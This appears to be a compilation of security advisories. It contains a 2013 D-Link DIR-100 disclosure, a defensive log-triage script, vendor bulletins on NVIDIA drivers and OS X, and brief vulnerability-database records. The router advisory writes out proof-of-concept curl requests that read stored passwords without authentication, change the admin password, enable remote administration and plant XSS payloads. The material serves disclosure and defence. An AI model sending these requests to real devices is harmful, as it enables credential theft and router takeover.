An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

- Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters like the PPPoE username and password without authentication [CWE-200]
- Execute privileged commands without authentication through a race condition, leading to weak authentication enforcement [CWE-287]
- Send a formatted request to a victim, which will then execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code which will be executed when a victim accesses the administrator interface [CWE-79]

CVE numbers for these vulnerabilities have not yet been assigned.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 web interface provides a CGI script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. The list of features provided by each CGI script can be retrieved by:

    curl 'http://192.168.1.104/cliget.cgi?cmd=help'
    # and respectively when authenticated
    curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device and can be retrieved by every attacker with access to the administrator interface, which listens on port 80. For retrieving the administrator password the request must not be authenticated.
### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

    curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used without authenticating beforehand, as the CGI script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same.

### Proof of Concept

    # open the router interface in a web browser and log in
    firefox 'http://192.168.0.1/'
    # open a new terminal or another web browser which is currently not logged
    # in and try to access
    curl 'http://192.168.0.1/cli.cgi?cmd=help'
    # this request will be authenticated and it will not be redirected to the
    # login page. If no user is logged in, the request will be redirected to
    # the login

## 3.3 Retrieve Sensitive Information

### Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device as well, like the PPTP and PPPoE username and password, the configured DynDNS username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.
### Proof of Concept

    curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

## 3.4 Cross-Site Request Forgery (CSRF)

### Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example, the attacker could change the administrator password (see proof of concept code) and enable remote access to the system.

### Proof of Concept

Changing the password for the administrator can be done when the IP address is authenticated:

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # Change password
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    # enable remote console
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

## 3.5 Cross-Site Scripting (XSS)

### Description

It is possible for an authenticated user to store information on the server which is not checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. With this vulnerability the victim (administrator) will run JavaScript code in the context of the D-Link DIR-100. XSS is possible because the input is filtered and validated only on the client side (in JavaScript code); sending data directly to the CGI scripts bypasses that filtering.
### Proof of Concept

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # XSS in Static IP Address Tab
    curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    # XSS in Scheduler tab
    curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

# 4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the Internet port. It is recommended to upgrade the router with the newest firmware for the D-Link DIR-100.

# 5 Timeline

2013-09-13 - First contact with D-Link support
2013-09-19 - Sent report
2013-10-14 - Requested status update; response: beta will be available mid October
2013-12-02 - Vendor publishes firmware update
2013-12-11 - Requested CVE IDs
2013-12-18 - Publish the report
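As a defensive addition that is not part of Felix Richter's report or the VARIoT record: a small log-triage script that flags the request patterns the advisory describes, namely unauthenticated reads of credential variables through `/cliget.cgi`, password or remote-administration changes through `/cli.cgi`, and HTML markup submitted to `/cli.cgi` (the stored XSS path). The log lines are constructed in a common access-log layout; that layout is an assumption, since the DIR-100's own logging is not described (it is the kind of record a proxy or IDS in front of the router would produce). The variable names are the ones from the advisory.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (not from the advisory). The access-log layout is
# an assumption; the request targets mirror the patterns described in the report.
SAMPLE_LOG = """\
192.168.0.23 - - [18/Dec/2013:10:01:02 +0100] "GET /cliget.cgi?cmd=$sys_user1 HTTP/1.1" 200 118
192.168.0.23 - - [18/Dec/2013:10:01:05 +0100] "GET /cliget.cgi?cmd=easysetup%20summary HTTP/1.1" 200 2310
192.168.0.42 - - [18/Dec/2013:10:02:11 +0100] "GET /cliget.cgi?cmd=help HTTP/1.1" 200 911
192.168.0.42 - - [18/Dec/2013:10:03:40 +0100] "GET /bsc_internet.htm HTTP/1.1" 200 5120
192.168.0.23 - - [18/Dec/2013:10:04:01 +0100] "GET /cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit HTTP/1.1" 200 40
192.168.0.23 - - [18/Dec/2013:10:05:17 +0100] "GET /cli.cgi?cmd=dhcps%20set%20name=%3Cscript%3Ealert(1)%3C/script%3E%26ip=192.168.0.199 HTTP/1.1" 200 40
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# cliget.cgi commands that return credentials without authentication (section 3.1/3.3).
SECRET_READS = {
    "$sys_user1", "easysetup summary", "$ddns1", "$poe_user", "$poe_pass",
    "$pptp_user", "$pptp_pass", "$log_mail_user", "$log_mail_pwd",
}
# cli.cgi settings touched by the password-change / remote-console requests (section 3.4).
ADMIN_WRITES = ("$sys_user1=", "$sys_passHash", "$sys_remote_enable",
                "$sys_remote_ip", "$sys_remote_port")
# Any HTML tag in a cli.cgi command is suspicious: the device stores it unchecked (section 3.5).
HTML_MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)


def extract_cmd(target):
    """Return (path, decoded cmd) for a request target; cmd is None when absent.
    Everything after 'cmd=' is taken as the command, because the CLI accepts
    '&' and ';' inside it (see the password-change request in the advisory)."""
    parts = urlsplit(target)
    m = re.search(r"(?:^|&)cmd=(.*)$", parts.query)
    return parts.path, (unquote(m.group(1)) if m else None)


def classify(path, cmd):
    """Map one request to a finding label, or None when it looks benign."""
    if cmd is None:
        return None
    if path == "/cliget.cgi" and cmd.strip() in SECRET_READS:
        return "credential-disclosure"
    if path == "/cli.cgi":
        if HTML_MARKUP.search(cmd):
            return "stored-xss-attempt"
        if any(w in cmd for w in ADMIN_WRITES):
            return "admin-config-change"
    return None


def scan(log_text):
    """Parse access-log lines and return the flagged requests in order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        path, cmd = extract_cmd(m["target"])
        kind = classify(path, cmd)
        if kind:
            findings.append({"ip": m["ip"], "time": m["ts"], "path": path,
                             "cmd": cmd, "finding": kind})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['finding']}: {f['path']} cmd={f['cmd']!r}")
```

The `cmd=help` probe and the plain page load are left unflagged on purpose; the point is to alert on the specific variables and markup the advisory shows are dangerous, which keeps the rule usable on a network where administrators legitimately use the web interface. Decoding happens before matching so that `%3Cscript%3E` and a literal `<script>` are treated alike.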
VAR-201401-0137 CVE-2013-5987 NVIDIA graphics drivers GPU access restriction bypass vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 allows local users to bypass intended access restrictions for the GPU and gain privileges via unknown vectors. NVIDIA Graphics Drivers are prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with escalated privileges.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04036775

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04036775
Version: 1

HPSBHF02946 rev.1 - HP Servers with NVIDIA GPU Computing Driver, Elevation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-05-09
Last Updated: 2014-05-09

Potential Security Impact: Elevation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP servers that use NVIDIA Computing GPU processors. The vulnerability could be exploited resulting in an elevation of privilege.

References: CVE-2013-5987, SSRT101355

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Server        GPU type(s)
DL360 G7      Q4000
SL390s G7     M2050, M2070, M2070Q, M2075, M2090
DL160 Gen8    Q4000
ML350p Gen8   Q4000, Q6000
DL360e Gen8   Q4000
DL380e Gen8   Q4000, Q6000
SL250s Gen8   M2070Q, M2075, M2090, K10, K20, K20X
SL270s Gen8   M2070Q, M2075, M2090, K10, K20, K20X

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector               Base Score
CVE-2013-5987    (AV:L/AC:M/Au:S/C:C/I:C/A:C)         6.6
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks NVIDIA and Marcin Kocielnicki from the X.Org Foundation Nouveau project for reporting this issue to security-alert@hp.com.

RESOLUTION

HP has provided an updated NVIDIA firmware driver version that resolves the security vulnerability.

Download the firmware driver from hp.com:
Go to support and drivers.
Search for the server model and then choose the operating system.
Select "Driver - NVIDIA Computing."

Note: For Windows choose the Driver NVIDIA Computing v3.21.01 or a subsequent version. For Linux choose the Driver NVIDIA Computing v3.19.72 or a subsequent version.

HISTORY
Version:1 (rev.1) - 9 May 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlNtE/EACgkQ4B86/C0qfVmMDwCgoDqC5FS8nW8RTOHZAUUqCZIY
0uIAn0TrMahIzRFsCo6DfAc8/FsNsz6f
=mv1t
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update 2014-001

OS X Mavericks 10.9.2 and Security Update 2014-001 is now available and addresses the following:

Apache
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most serious of which may lead to cross-site scripting. These issues were addressed by updating Apache to version 2.2.26.
CVE-ID
CVE-2013-1862
CVE-2013-1896

App Sandbox
Available for: OS X Mountain Lion v10.8.5
Impact: The App Sandbox may be bypassed
Description: The LaunchServices interface for launching an application allowed sandboxed apps to specify the list of arguments passed to the new process. A compromised sandboxed application could abuse this to bypass the sandbox. This issue was addressed by preventing sandboxed applications from specifying arguments. This issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2013-5179 : Friedrich Graeter of The Soulmen GbR

ATS
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution
Description: A memory corruption issue existed in the handling of Type 1 fonts. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1254 : Felix Groebert of the Google Security Team

ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A memory corruption issue existed in the handling of Mach messages passed to ATS. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1262 : Meder Kydyraliev of the Google Security Team

ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: An arbitrary free issue existed in the handling of Mach messages passed to ATS. This issue was addressed through additional validation of Mach messages.
CVE-ID
CVE-2014-1255 : Meder Kydyraliev of the Google Security Team

ATS
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A buffer overflow issue existed in the handling of Mach messages passed to ATS. This issue was addressed by additional bounds checking.
CVE-ID
CVE-2014-1256 : Meder Kydyraliev of the Google Security Team

Certificate Trust Policy
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Root certificates have been updated
Description: The set of system root certificates has been updated. The complete list of recognized system roots may be viewed via the Keychain Access application.

CFNetwork Cookies
Available for: OS X Mountain Lion v10.8.5
Impact: Session cookies may persist even after resetting Safari
Description: Resetting Safari did not always delete session cookies until Safari was closed. This issue was addressed through improved handling of session cookies. This issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1257 : Rob Ansaldo of Amherst College, Graham Bennett

CoreAnimation
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Visiting a maliciously crafted site may lead to an unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreAnimation's handling of images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1258 : Karl Smith of NCC Group

CoreText
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Applications that use CoreText may be vulnerable to an unexpected application termination or arbitrary code execution
Description: A signedness issue existed in CoreText in the handling of Unicode fonts. This issue is addressed through improved bounds checking.
CVE-ID
CVE-2014-1261 : Lucas Apa and Carlos Mario Penagos of IOActive Labs

curl
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information
Description: When using curl to connect to an HTTPS URL containing an IP address, the IP address was not validated against the certificate. This issue does not affect systems prior to OS X Mavericks v10.9.
CVE-ID
CVE-2014-1263 : Roland Moriz of Moriz GmbH

Data Security
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.
CVE-ID
CVE-2014-1266

Date and Time
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: An unprivileged user may change the system clock
Description: This update changes the behavior of the systemsetup command to require administrator privileges to change the system clock.
CVE-ID
CVE-2014-1265

File Bookmark
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a file with a maliciously crafted name may lead to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of file names. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1259

Finder
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Accessing a file's ACL via Finder may lead to other users gaining unauthorized access to files
Description: Accessing a file's ACL via Finder may corrupt the ACLs on the file. This issue was addressed through improved handling of ACLs.
CVE-ID
CVE-2014-1264

ImageIO
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted JPEG file may lead to the disclosure of memory contents
Description: An uninitialized memory access issue existed in libjpeg's handling of JPEG markers, resulting in the disclosure of memory contents. This issue was addressed by better JPEG handling.
CVE-ID
CVE-2013-6629 : Michal Zalewski

IOSerialFamily
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5
Impact: Executing a malicious application may result in arbitrary code execution within the kernel
Description: An out of bounds array access existed in the IOSerialFamily driver. This issue was addressed through additional bounds checking. This issue does not affect systems running OS X Mavericks v10.9 or later.
CVE-ID
CVE-2013-5139 : @dent1zt

LaunchServices
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5
Impact: A file could show the wrong extension
Description: An issue existed in the handling of certain unicode characters that could allow filenames to show incorrect extensions. The issue was addressed by filtering unsafe unicode characters from display in filenames. This issue does not affect systems running OS X Mavericks v10.9 or later.
CVE-ID
CVE-2013-5178 : Jesse Ruderman of Mozilla Corporation, Stephane Sudre of Intego

NVIDIA Drivers
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Executing a malicious application could result in arbitrary code execution within the graphics card
Description: An issue existed that allowed writes to some trusted memory on the graphics card. This issue was addressed by removing the ability of the host to write to that memory.
CVE-ID
CVE-2013-5986 : Marcin Kościelnicki from the X.Org Foundation Nouveau project
CVE-2013-5987 : Marcin Kościelnicki from the X.Org Foundation Nouveau project

PHP
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most serious of which may have led to arbitrary code execution. These issues were addressed by updating PHP to version 5.4.22 on OS X Mavericks v10.9, and 5.3.28 on OS X Lion and Mountain Lion.
CVE-ID
CVE-2013-4073
CVE-2013-4113
CVE-2013-4248
CVE-2013-6420

QuickLook
Available for: OS X Mountain Lion v10.8.5
Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may have led to an unexpected application termination or arbitrary code execution. This issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1260 : Felix Groebert of the Google Security Team

QuickLook
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Downloading a maliciously crafted Microsoft Word document may lead to an unexpected application termination or arbitrary code execution
Description: A double free issue existed in QuickLook's handling of Microsoft Word documents. This issue was addressed through improved memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ftab' atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1246 : An anonymous researcher working with HP's Zero Day Initiative

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of 'dref' atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1247 : Tom Gallagher & Paul Bates working with HP's Zero Day Initiative

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ldat' atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1248 : Jason Kratzer working with iDefense VCP

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PSD images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1249 : dragonltx of Tencent Security Team

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution
Description: An out of bounds byte swapping issue existed in the handling of 'ttfo' elements. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1250 : Jason Kratzer working with iDefense VCP

QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of 'stsz' atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1245 : Tom Gallagher & Paul Bates working with HP's Zero Day Initiative

Secure Transport
Available for: OS X Mountain Lion v10.8.5
Impact: An attacker may be able to decrypt data protected by SSL
Description: There were known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite used a block cipher in CBC mode. To address these issues for applications using Secure Transport, the 1-byte fragment mitigation was enabled by default for this configuration.
CVE-ID
CVE-2011-3389 : Juliano Rizzo and Thai Duong

OS X Mavericks v10.9.2 includes the content of Safari 7.0.2.
OS X Mavericks v10.9.2 and Security Update 2014-001 may be obtained from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

Information will also be posted to the Apple Security Updates web site:
http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key, and details are available at:
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJTDNeoAAoJEPefwLHPlZEwaRAP/3i/2qRvNv6JqmE9p48uEyXn
mlxwXpMyop+vrgMmuiSP14EGSv06HO04PNUtaWPxm7tVYXu0tMtjDcYdIu40TAy6
U0T6QhRZC/uag1DCvdEOvqRUajKmmPtHTCJ6OsQGtGJHlEM+S5XgxRr7qgfkHMfb
OlqFsgpdL/AAiYNfzItN2C+r2Lfwro6LDlxhikpASojlMFQrk8nJ6irRv617anSZ
3DwJW2iJxNfpVrgqA1Nrx1fkrPmeT/8jgGuEP6RaKiWIbfXjRG5BW9WuarMqmaP8
C6XoTaJaqEO9zb7F2uJR0HIYpJd065y/xiYNm91yDWIjdrO3wVgNVPGo1pHVyYsY
Y7lcyHUVJortKF8SHquw0j3Ujeugu8iWp6ND/00/4dGvwb0jzrxPUxkEmJ43130O
t2Obtxdsaa+ub8cZHDN93WB3FQR5hd+KaeXLJC55q0qYY8o8zqdPqXAlYAP2gUQX
iB4Bs7NAh2CNJWNTtk2soTjZOwPvPLSPZ6I3w5i0HVP7HQl5K8chjihAwSeyezCZ
q5gxCiK0lBW88AUd9n3L7ZOW2Rg53mh6+RiUL/VQ7TfidoP417VDKum300pZkgNv
kBCklX9ya7QeLjOMnbnsTk32qG+TiDPgiGZ5IrK6C6T26dexJWbm8tuwPjy5r8mI
aiYIh+SzR0rBdMZRgyzv
=+DAJ
-----END PGP SIGNATURE-----

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: NVIDIA Drivers: Privilege Escalation
      Date: February 02, 2014
      Bugs: #493448
        ID: 201402-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A NVIDIA drivers bug allows unprivileged user-mode software to access the GPU inappropriately, allowing for privilege escalation.

Background
==========

The NVIDIA drivers provide X11 and GLX support for NVIDIA graphic boards.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  x11-drivers/nvidia-drivers       < 331.20              *>= 304.116
                                                            *>= 319.76
                                                              >= 331.20

Description
===========

The vulnerability is caused due to the driver allowing unprivileged user-mode software to access the GPU.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All NVIDIA Drivers users using the 331 branch should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-331.20"

All NVIDIA Drivers users using the 319 branch should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-319.76"

All NVIDIA Drivers users using the 304 branch should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-304.116"

References
==========

[ 1 ] CVE-2013-5986
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5986
[ 2 ] CVE-2013-5987
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5987

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201402-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
VAR-201312-0547 No CVE D-Link DIR Series Router 'model/__show_info.php' Local File Disclosure Vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
The D-Link DIR series router 'model/__show_info.php' fails to properly validate user-submitted input, allowing remote attackers to submit malicious requests that disclose sensitive file contents. D-Link DIR-615 and other DIR series devices are wireless router products from D-Link. A local file disclosure vulnerability exists in several D-Link DIR series routers. The vulnerability stems from the program's insufficient filtering of user-submitted input. An attacker could use this vulnerability to obtain sensitive information. The following models and versions have vulnerabilities: D-Link DIR-615 0, D-Link DIR-300 2.05B03, D-Link DIR-300 2.04, D-Link DIR-300 2.01B1, D-Link DIR-300 1.05B09, D-Link DIR-300 1.05, D-Link DIR-300 1.04, D-Link DIR-300 0. This may aid in further attacks.
VAR-201312-0236 CVE-2013-6695 Cisco Secure Access Control System RBAC implementation information disclosure vulnerability

